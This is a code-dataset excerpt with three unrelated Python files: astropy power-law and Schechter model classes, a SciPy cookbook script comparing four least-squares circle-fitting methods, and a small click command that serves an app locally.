amplitude : float
Model amplitude at the break point.
x_break : float
Break point.
alpha_1 : float
Power law index for ``x << x_break``.
alpha_2 : float
Power law index for ``x >> x_break``.
delta : float
Smoothness parameter.
See Also
--------
BrokenPowerLaw1D
Notes
-----
Model formula (with :math:`A` for ``amplitude``, :math:`x_b` for
``x_break``, :math:`\\alpha_1` for ``alpha_1``,
:math:`\\alpha_2` for ``alpha_2`` and :math:`\\Delta` for
``delta``):
.. math::
f(x) = A \\left( \\frac{x}{x_b} \\right) ^ {-\\alpha_1}
\\left\\{
\\frac{1}{2}
\\left[
1 + \\left( \\frac{x}{x_b}\\right)^{1 / \\Delta}
\\right]
\\right\\}^{(\\alpha_1 - \\alpha_2) \\Delta}
The change of slope occurs between the values :math:`x_1`
and :math:`x_2` such that:
.. math::
\\log_{10} \\frac{x_2}{x_b} = \\log_{10} \\frac{x_b}{x_1}
\\sim \\Delta
At values :math:`x \\lesssim x_1` and :math:`x \\gtrsim x_2` the
model is approximately a simple power law with index
:math:`\\alpha_1` and :math:`\\alpha_2` respectively. The two
power laws are smoothly joined at values :math:`x_1 < x < x_2`,
hence the :math:`\\Delta` parameter sets the "smoothness" of the
slope change.
The ``delta`` parameter is bounded to values greater than 1e-3
(corresponding to :math:`x_2 / x_1 \\gtrsim 1.002`) to avoid
overflow errors.
The ``amplitude`` parameter is bounded to positive values since
this model is typically used to represent positive quantities.
Examples
--------
.. plot::
:include-source:
import numpy as np
import matplotlib.pyplot as plt
from astropy.modeling import models
x = np.logspace(0.7, 2.3, 500)
f = models.SmoothlyBrokenPowerLaw1D(amplitude=1, x_break=20,
alpha_1=-2, alpha_2=2)
plt.figure()
plt.title("amplitude=1, x_break=20, alpha_1=-2, alpha_2=2")
f.delta = 0.5
plt.loglog(x, f(x), '--', label='delta=0.5')
f.delta = 0.3
plt.loglog(x, f(x), '-.', label='delta=0.3')
f.delta = 0.1
plt.loglog(x, f(x), label='delta=0.1')
plt.axis([x.min(), x.max(), 0.1, 1.1])
plt.legend(loc='lower center')
plt.grid(True)
plt.show()
"""
amplitude = Parameter(default=1, min=0, description="Peak value at break point")
x_break = Parameter(default=1, description="Break point")
alpha_1 = Parameter(default=-2, description="Power law index before break point")
alpha_2 = Parameter(default=2, description="Power law index after break point")
delta = Parameter(default=1, min=1.e-3, description="Smoothness Parameter")
@amplitude.validator
def amplitude(self, value):
if np.any(value <= 0):
raise InputParameterError(
"amplitude parameter must be > 0")
@delta.validator
def delta(self, value):
if np.any(value < 0.001):
raise InputParameterError(
"delta parameter must be >= 0.001")
@staticmethod
def evaluate(x, amplitude, x_break, alpha_1, alpha_2, delta):
"""One dimensional smoothly broken power law model function"""
# Pre-calculate `x/x_b`
xx = x / x_break
# Initialize the return value
f = np.zeros_like(xx, subok=False)
if isinstance(amplitude, Quantity):
return_unit = amplitude.unit
amplitude = amplitude.value
else:
return_unit = None
# The quantity `t = (x / x_b)^(1 / delta)` can become quite
# large. To avoid overflow errors we will start by calculating
# its natural logarithm:
logt = np.log(xx) / delta
# When `t >> 1` or `t << 1` we don't actually need to compute
# the `t` value since the main formula (see docstring) can be
# significantly simplified by neglecting `1` or `t`
# respectively. In the following we will check whether `t` is
# much greater, much smaller, or comparable to 1 by comparing
# the `logt` value with an appropriate threshold.
threshold = 30 # corresponding to exp(30) ~ 1e13
i = logt > threshold
if i.max():
# In this case the main formula reduces to a simple power
# law with index `alpha_2`.
f[i] = amplitude * xx[i] ** (-alpha_2) / (2. ** ((alpha_1 - alpha_2) * delta))
i = logt < -threshold
if i.max():
# In this case the main formula reduces to a simple power
# law with index `alpha_1`.
f[i] = amplitude * xx[i] ** (-alpha_1) / (2. ** ((alpha_1 - alpha_2) * delta))
i = np.abs(logt) <= threshold
if i.max():
# In this case the `t` value is "comparable" to 1, hence we
            # will evaluate the whole formula.
t = np.exp(logt[i])
r = (1. + t) / 2.
f[i] = amplitude * xx[i] ** (-alpha_1) * r ** ((alpha_1 - alpha_2) * delta)
if return_unit:
return Quantity(f, unit=return_unit, copy=False)
return f
@staticmethod
def fit_deriv(x, amplitude, x_break, alpha_1, alpha_2, delta):
"""One dimensional smoothly broken power law derivative with respect
to parameters"""
# Pre-calculate `x_b` and `x/x_b` and `logt` (see comments in
# SmoothlyBrokenPowerLaw1D.evaluate)
xx = x / x_break
logt = np.log(xx) / delta
# Initialize the return values
f = np.zeros_like(xx)
d_amplitude = np.zeros_like(xx)
d_x_break = np.zeros_like(xx)
d_alpha_1 = np.zeros_like(xx)
d_alpha_2 = np.zeros_like(xx)
d_delta = np.zeros_like(xx)
threshold = 30 # (see comments in SmoothlyBrokenPowerLaw1D.evaluate)
i = logt > threshold
if i.max():
f[i] = amplitude * xx[i] ** (-alpha_2) \
/ (2. ** ((alpha_1 - alpha_2) * delta))
d_amplitude[i] = f[i] / amplitude
d_x_break[i] = f[i] * alpha_2 / x_break
d_alpha_1[i] = f[i] * (-delta * np.log(2))
d_alpha_2[i] = f[i] * (-np.log(xx[i]) + delta * np.log(2))
d_delta[i] = f[i] * (-(alpha_1 - alpha_2) * np.log(2))
i = logt < -threshold
if i.max():
f[i] = amplitude * xx[i] ** (-alpha_1) \
/ (2. ** ((alpha_1 - alpha_2) * delta))
d_amplitude[i] = f[i] / amplitude
d_x_break[i] = f[i] * alpha_1 / x_break
d_alpha_1[i] = f[i] * (-np.log(xx[i]) - delta * np.log(2))
d_alpha_2[i] = f[i] * delta * np.log(2)
d_delta[i] = f[i] * (-(alpha_1 - alpha_2) * np.log(2))
i = np.abs(logt) <= threshold
if i.max():
t = np.exp(logt[i])
r = (1. + t) / 2.
f[i] = amplitude * xx[i] ** (-alpha_1) \
* r ** ((alpha_1 - alpha_2) * delta)
d_amplitude[i] = f[i] / amplitude
d_x_break[i] = f[i] * (alpha_1 - (alpha_1 - alpha_2) * t / 2. / r) / x_break
d_alpha_1[i] = f[i] * (-np.log(xx[i]) + delta * np.log(r))
d_alpha_2[i] = f[i] * (-delta * np.log(r))
d_delta[i] = f[i] * (alpha_1 - alpha_2) \
* (np.log(r) - t / (1. + t) / delta * np.log(xx[i]))
return [d_amplitude, d_x_break, d_alpha_1, d_alpha_2, d_delta]
@property
def input_units(self):
if self.x_break.unit is None:
return None
return {self.inputs[0]: self.x_break.unit}
def _parameter_units_for_data_units(self, inputs_unit, outputs_unit):
return {'x_break': inputs_unit[self.inputs[0]],
'amplitude': outputs_unit[self.outputs[0]]}
class ExponentialCutoffPowerLaw1D(Fittable1DModel):
"""
One dimensional power law model with an exponential cutoff.
Parameters
----------
amplitude : float
Model amplitude
x_0 : float
Reference point
alpha : float
Power law index
x_cutoff : float
Cutoff point
See Also
--------
PowerLaw1D, BrokenPowerLaw1D, LogParabola1D
Notes
-----
Model formula (with :math:`A` for ``amplitude`` and :math:`\\alpha` for ``alpha``):
.. math:: f(x) = A (x / x_0) ^ {-\\alpha} \\exp (-x / x_{cutoff})
"""
amplitude = Parameter(default=1, description="Peak value of model")
x_0 = Parameter(default=1, description="Reference point")
alpha = Parameter(default=1, description="Power law index")
x_cutoff = Parameter(default=1, description="Cutoff point")
@staticmethod
def evaluate(x, amplitude, x_0, alpha, x_cutoff):
"""One dimensional exponential cutoff power law model function"""
xx = x / x_0
return amplitude * xx ** (-alpha) * np.exp(-x / x_cutoff)
@staticmethod
def fit_deriv(x, amplitude, x_0, alpha, x_cutoff):
"""One dimensional exponential cutoff power law derivative with respect to parameters"""
xx = x / x_0
xc = x / x_cutoff
d_amplitude = xx ** (-alpha) * np.exp(-xc)
d_x_0 = alpha * amplitude * d_amplitude / x_0
d_alpha = -amplitude * d_amplitude * np.log(xx)
d_x_cutoff = amplitude * x * d_amplitude / x_cutoff ** 2
return [d_amplitude, d_x_0, d_alpha, d_x_cutoff]
@property
def input_units(self):
if self.x_0.unit is None:
return None
return {self.inputs[0]: self.x_0.unit}
def _parameter_units_for_data_units(self, inputs_unit, outputs_unit):
return {'x_0': inputs_unit[self.inputs[0]],
'x_cutoff': inputs_unit[self.inputs[0]],
'amplitude': outputs_unit[self.outputs[0]]}
class LogParabola1D(Fittable1DModel):
"""
One dimensional log parabola model (sometimes called curved power law).
Parameters
----------
amplitude : float
Model amplitude
x_0 : float
Reference point
alpha : float
Power law index
beta : float
Power law curvature
See Also
--------
PowerLaw1D, BrokenPowerLaw1D, ExponentialCutoffPowerLaw1D
Notes
-----
Model formula (with :math:`A` for ``amplitude`` and
:math:`\\alpha` for ``alpha`` and :math:`\\beta` for ``beta``):
.. math:: f(x) = A \\left(
\\frac{x}{x_{0}}\\right)^{- \\alpha - \\beta \\log{\\left (\\frac{x}{x_{0}}
\\right )}}
"""
amplitude = Parameter(default=1, description="Peak value of model")
x_0 = Parameter(default=1, description="Reference point")
alpha = Parameter(default=1, description="Power law index")
beta = Parameter(default=0, description="Power law curvature")
@staticmethod
def evaluate(x, amplitude, x_0, alpha, beta):
"""One dimensional log parabola model function"""
xx = x / x_0
exponent = -alpha - beta * np.log(xx)
return amplitude * xx ** exponent
@staticmethod
def fit_deriv(x, amplitude, x_0, alpha, beta):
"""One dimensional log parabola derivative with respect to parameters"""
xx = x / x_0
log_xx = np.log(xx)
exponent = -alpha - beta * log_xx
d_amplitude = xx ** exponent
d_beta = -amplitude * d_amplitude * log_xx ** 2
d_x_0 = amplitude * d_amplitude * (beta * log_xx / x_0 - exponent / x_0)
d_alpha = -amplitude * d_amplitude * log_xx
return [d_amplitude, d_x_0, d_alpha, d_beta]
@property
def input_units(self):
if self.x_0.unit is None:
return None
return {self.inputs[0]: self.x_0.unit}
def _parameter_units_for_data_units(self, inputs_unit, outputs_unit):
return {'x_0': inputs_unit[self.inputs[0]],
'amplitude': outputs_unit[self.outputs[0]]}
class Schechter1D(Fittable1DModel):
r"""
Schechter luminosity function (`Schechter 1976
<https://ui.adsabs.harvard.edu/abs/1976ApJ...203..297S/abstract>`_),
parameterized in terms of magnitudes.
Parameters
----------
phi_star : float
The normalization factor in units of number density.
m_star : float
The characteristic magnitude where the power-law form of the
function cuts off. Must not have units.
alpha : float
The power law index, also known as the faint-end slope. Must not
have units.
See Also
--------
PowerLaw1D, ExponentialCutoffPowerLaw1D, BrokenPowerLaw1D
Notes
-----
Model formula (with :math:`\phi^{*}` for ``phi_star``, :math:`M^{*}`
for ``m_star``, and :math:`\alpha` for ``alpha``):
.. math::
n(M) \ dM = (0.4 \ln 10) \ \phi^{*} \
[{10^{0.4 (M^{*} - M)}}]^{\alpha + 1} \
\exp{[-10^{0.4 (M^{*} - M)}]} \ dM
``phi_star`` is the normalization factor in units of number density.
``m_star`` is the characteristic magnitude where the power-law form
of the function cuts off into the exponential form. ``alpha`` is
the power-law index, defining the faint-end slope of the luminosity
function.
Examples
--------
.. plot::
:include-source:
from astropy.modeling.models import Schechter1D
import astropy.units as u
import matplotlib.pyplot as plt
import numpy as np
phi_star = 4.3e-4 * (u.Mpc ** -3)
m_star = -20.26
alpha = -1.98
model = Schechter1D(phi_star, m_star, alpha)
mag = np.linspace(-25, -17)
fig, ax = plt.subplots()
ax.plot(mag, model(mag))
ax.set_yscale('log')
ax.set_xlim(-22.6, -17)
ax.set_ylim(1.e-7, 1.e-2)
ax.set_xlabel('$M_{UV}$')
ax.set_ylabel('$\phi$ [mag$^{-1}$ Mpc$^{-3}]$')
References
----------
.. [1] Schechter 1976; ApJ 203, 297
(https://ui.adsabs.harvard.edu/abs/1976ApJ...203..297S/abstract)
.. [2] `Luminosity function <https://en.wikipedia.org/wiki/Luminosity_function_(astronomy)>`_
"""
phi_star = Parameter(default=1., description=('Normalization factor '
'in units of number density'))
m_star = Parameter(default=-20., description='Characteristic magnitude')
alpha = Parameter(default=-1., description='Faint-end slope')
@staticmethod
def evaluate(mag, phi_star, m_star, alpha):
"""Schechter luminosity function model function."""
if isinstance(mag, Quantity) or isinstance(m_star, Quantity):
raise ValueError('mag and m_star must not have units')
factor = 10 ** (0.4 * (m_star - mag))
return (0.4 * np.log(10) * phi_star * factor**(alpha + 1)
* np.exp(-factor))
@staticmethod
def fit_deriv(mag, phi_star, m_star, alpha):
"""
Schechter luminosity function derivative with respect to
parameters.
"""
if isinstance(mag, Quantity) or isinstance(m_star, Quantity):
raise ValueError('mag and m_star must not have units')
factor = 10 ** (0.4 * (m_star - mag))
d_phi_star = 0.4 * np.log(10) * factor**(alpha + 1) * np.exp(-factor)
func = phi_star * d_phi_star
d_m_star = ((alpha + 1) * 0.4 * np.log(10) * func
- (0.4 * np.log(10) * func * factor))
d_alpha = func * np.log(factor)
return [d_phi_star, d_m_star, d_alpha]
@property
def input_units(self):
if self.m_star.unit is None:
return None
return {self.inputs[0]: self.m_star.unit}
def _parameter_units_for_data_units(self, inputs_unit, outputs_unit):
return {'m_star': inputs_unit[self.inputs[0]],
'phi_star': outputs_unit[self.outputs[0]]}
| 32.896166 | 97 | 0.577332 | [
"BSD-3-Clause"
] | JefftheCloudDog/astropy | astropy/modeling/powerlaws.py | 20,593 | Python |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
"""
http://www.scipy.org/Cookbook/Least_Squares_Circle
"""
from numpy import *
# Coordinates of the 2D points
# x = r_[ 9, 35, -13, 10, 23, 0]
# y = r_[ 34, 10, 6, -14, 27, -10]
x = r_[36, 36, 19, 18, 33, 26]
y = r_[14, 10, 28, 31, 18, 26]
# R0 = 25
# nb_pts = 8
# dR = 2
# angle =9*pi/5
# x = (10 + R0*cos(theta0) + dR*random.normal(size=nb_pts)).round()
# y = (10 + R0*sin(theta0) + dR*random.normal(size=nb_pts)).round()
# == METHOD 1 ==
method_1 = 'algebraic'
# coordinates of the barycenter
x_m = mean(x)
y_m = mean(y)
# calculation of the reduced coordinates
u = x - x_m
v = y - y_m
# linear system defining the center in reduced coordinates (uc, vc):
# Suu * uc + Suv * vc = (Suuu + Suvv)/2
# Suv * uc + Svv * vc = (Suuv + Svvv)/2
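# (These normal equations follow from the algebraic, Kasa-style fit: minimize
#  sum_i (u_i**2 + v_i**2 - 2*uc*u_i - 2*vc*v_i - c)**2 and use the fact that
#  sum(u) = sum(v) = 0 in the barycentric frame.)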
Suv = sum(u*v)
Suu = sum(u**2)
Svv = sum(v**2)
Suuv = sum(u**2 * v)
Suvv = sum(u * v**2)
Suuu = sum(u**3)
Svvv = sum(v**3)
# Solving the linear system
A = array([ [ Suu, Suv ], [Suv, Svv]])
B = array([ Suuu + Suvv, Svvv + Suuv ])/2.0
uc, vc = linalg.solve(A, B)
xc_1 = x_m + uc
yc_1 = y_m + vc
# Calculation of all distances from the center (xc_1, yc_1)
Ri_1 = sqrt((x-xc_1)**2 + (y-yc_1)**2)
R_1 = mean(Ri_1)
residu_1 = sum((Ri_1-R_1)**2)
residu2_1= sum((Ri_1**2-R_1**2)**2)
# Decorator to count functions calls
import functools
def countcalls(fn):
    """Decorator that counts how many times the wrapped function is called."""
@functools.wraps(fn)
def wrapped(*args):
wrapped.ncalls +=1
return fn(*args)
wrapped.ncalls = 0
return wrapped
# == METHOD 2 ==
from scipy import optimize
method_2 = "leastsq"
def calc_R(c):
""" calculate the distance of each 2D points from the center c=(xc, yc) """
return sqrt((x-c[0])**2 + (y-c[1])**2)
@countcalls
def f_2(c):
""" calculate the algebraic distance between the 2D points and the mean circle centered at c=(xc, yc) """
Ri = calc_R(c)
return Ri - Ri.mean()
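# Unlike method 1, this is a geometric fit: leastsq adjusts the center (xc, yc) so that the
# spread of the point-to-center distances Ri around their mean is minimized; the radius is
# then taken as that mean distance.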
center_estimate = x_m, y_m
center_2, ier = optimize.leastsq(f_2, center_estimate)
xc_2, yc_2 = center_2
Ri_2 = calc_R(center_2)
R_2 = Ri_2.mean()
residu_2 = sum((Ri_2 - R_2)**2)
residu2_2 = sum((Ri_2**2-R_2**2)**2)
ncalls_2 = f_2.ncalls
# == METHOD 3 ==
from scipy import odr
method_3 = "odr"
@countcalls
def f_3(beta, x):
""" implicit function of the circle """
xc, yc, r = beta
return (x[0]-xc)**2 + (x[1]-yc)**2 -r**2
def calc_estimate(data):
""" Return a first estimation on the parameter from the data """
xc0, yc0 = data.x.mean(axis=1)
r0 = sqrt((data.x[0]-xc0)**2 +(data.x[1] -yc0)**2).mean()
return xc0, yc0, r0
# for implicit function :
# data.x contains both coordinates of the points
# data.y is the dimensionality of the response
lsc_data = odr.Data(row_stack([x, y]), y=1)
lsc_model = odr.Model(f_3, implicit=True, estimate=calc_estimate)
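# With implicit=True, ODR adjusts beta so that f_3(beta, x) is driven toward zero for every
# point (an errors-in-variables, orthogonal-distance formulation) rather than fitting y = f(x).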
lsc_odr = odr.ODR(lsc_data, lsc_model)
lsc_out = lsc_odr.run()
xc_3, yc_3, R_3 = lsc_out.beta
Ri_3 = calc_R([xc_3, yc_3])
residu_3 = sum((Ri_3 - R_3)**2)
residu2_3 = sum((Ri_3**2-R_3**2)**2)
ncalls_3 = f_3.ncalls
print('lsc_out.sum_square = ', lsc_out.sum_square)
# == METHOD 4 ==
method_4 = "odr with jacobian"
@countcalls
def f_4(beta, x):
""" implicit function of the circle """
xc, yc, r = beta
xi, yi = x
return (xi-xc)**2 + (yi-yc)**2 -r**2
@countcalls
def jacb(beta, x):
""" Jacobian function with respect to the parameters beta.
return df/dbeta
"""
xc, yc, r = beta
xi, yi = x
df_db = empty((beta.size, x.shape[1]))
df_db[0] = 2*(xc-xi) # d_f/dxc
df_db[1] = 2*(yc-yi) # d_f/dyc
df_db[2] = -2*r # d_f/dr
return df_db
@countcalls
def jacd(beta, x):
""" Jacobian function with respect to the input x.
return df/dx
"""
xc, yc, r = beta
xi, yi = x
df_dx = empty_like(x)
df_dx[0] = 2*(xi-xc) # d_f/dxi
df_dx[1] = 2*(yi-yc) # d_f/dyi
return df_dx
def calc_estimate(data):
""" Return a first estimation on the parameter from the data """
xc0, yc0 = data.x.mean(axis=1)
r0 = sqrt((data.x[0]-xc0)**2 +(data.x[1] -yc0)**2).mean()
return xc0, yc0, r0
# for implicit function :
# data.x contains both coordinates of the points
# data.y is the dimensionality of the response
lsc_data = odr.Data(row_stack([x, y]), y=1)
lsc_model = odr.Model(f_4, implicit=True, estimate=calc_estimate, fjacd=jacd, fjacb=jacb)
lsc_odr = odr.ODR(lsc_data, lsc_model)
lsc_odr.set_job(deriv=3) # use user derivatives function without checking
lsc_out = lsc_odr.run()
xc_4, yc_4, R_4 = lsc_out.beta
Ri_4 = calc_R([xc_4, yc_4])
residu_4 = sum((Ri_4 - R_4)**2)
residu2_4 = sum((Ri_4**2-R_4**2)**2)
ncalls_4 = f_4.ncalls
print("Method 4 :")
print("Function calls : f_4=%d jacb=%d jacd=%d" % (f_4.ncalls, jacb.ncalls, jacd.ncalls))
# Summary
fmt = '%-18s %10.5f %10.5f %10.5f %10d %10.6f %10.6f %10.2f'
print(('\n%-18s' + ' %10s'*7) % tuple('METHOD Xc Yc Rc nb_calls std(Ri) residu residu2'.split()))
print('-'*(18 + 7*(10+1)))
print(fmt % (method_1, xc_1, yc_1, R_1, 1, Ri_1.std(), residu_1, residu2_1))
print(fmt % (method_2, xc_2, yc_2, R_2, ncalls_2, Ri_2.std(), residu_2, residu2_2))
print(fmt % (method_3, xc_3, yc_3, R_3, ncalls_3, Ri_3.std(), residu_3, residu2_3))
print(fmt % (method_4, xc_4, yc_4, R_4, ncalls_4, Ri_4.std(), residu_4, residu2_4))
# plotting functions
from matplotlib import pyplot as p, cm
def plot_all(residu2=False, basename='circle'):
    """ Draw the data points, the best-fit circles and centers for the three methods,
    and add the iso-contours corresponding to the field residu or residu2.
"""
f = p.figure(figsize=(6.5, 4.5), dpi=90, facecolor='white')
p.axis('equal')
p.plot(x, y, 'ro', label='data', ms=9, mec='b', mew=1)
theta_fit = linspace(-pi, pi, 180)
x_fit1 = xc_1 + R_1*cos(theta_fit)
y_fit1 = yc_1 + R_1*sin(theta_fit)
p.plot(x_fit1, y_fit1, 'b-' , label=method_1, lw=2)
x_fit2 = xc_2 + R_2*cos(theta_fit)
y_fit2 = yc_2 + R_2*sin(theta_fit)
p.plot(x_fit2, y_fit2, 'k--', label=method_2, lw=2)
x_fit3 = xc_3 + R_3*cos(theta_fit)
y_fit3 = yc_3 + R_3*sin(theta_fit)
p.plot(x_fit3, y_fit3, 'r-.', label=method_3, lw=2)
p.plot([xc_1], [yc_1], 'bD', mec='y', mew=1)
p.plot([xc_2], [yc_2], 'gD', mec='r', mew=1)
p.plot([xc_3], [yc_3], 'kD', mec='w', mew=1)
# draw
p.xlabel('x')
p.ylabel('y')
p.legend(loc='best',labelspacing=0.1)
# plot the residu fields
nb_pts = 100
p.draw()
xmin, xmax = p.xlim()
ymin, ymax = p.ylim()
vmin = min(xmin, ymin)
vmax = max(xmax, ymax)
xg, yg = ogrid[vmin:vmax:nb_pts*1j, vmin:vmax:nb_pts*1j]
xg = xg[..., newaxis]
yg = yg[..., newaxis]
Rig = sqrt( (xg - x)**2 + (yg - y)**2 )
Rig_m = Rig.mean(axis=2)[..., newaxis]
    if residu2:
        residu = sum((Rig**2 - Rig_m**2)**2, axis=2)
    else:
        residu = sum((Rig - Rig_m)**2, axis=2)
lvl = exp(linspace(log(residu.min()), log(residu.max()), 15))
p.contourf(xg.flat, yg.flat, residu.T, lvl, alpha=0.75, cmap=cm.Purples_r)
cbar = p.colorbar(format='%.f')
    if residu2:
        cbar.set_label('Residu_2')
    else:
        cbar.set_label('Residu')
p.xlim(xmin=vmin, xmax=vmax)
p.ylim(ymin=vmin, ymax=vmax)
p.grid()
    p.title('Least Squares Circle')
p.savefig('%s_residu%d.png' % (basename, 2 if residu2 else 1))
plot_all(residu2=False, basename='circle')
plot_all(residu2=True , basename='circle')
p.show()
# vim: set et sts=4 sw=4:
| 26.829268 | 109 | 0.598961 | [
"BSD-3-Clause"
] | AlexEMG/scipy-cookbook | ipython/attachments/Least_Squares_Circle/least_squares_circle_v3.py | 7,700 | Python |
import click
from config.settings import app
@click.group()
def cli():
"""
Serves the application for testing locally. If you want to test it
    in a production-like environment, please deploy with Docker.\n
    :return: None
"""
click.echo('\033[95mINFO: Starting the app..\033[0m')
app.run()
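# Note (assumption, not stated in this file): given the cli/commands/cmd_serve.py layout,
# this `cli` group is presumably collected and registered by a parent click CLI elsewhere
# in the project; the entry point that wires it up is not shown here.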
| 19.764706 | 70 | 0.678571 | [
"MIT"
] | laith43d/JUJU-User-Example | cli/commands/cmd_serve.py | 336 | Python |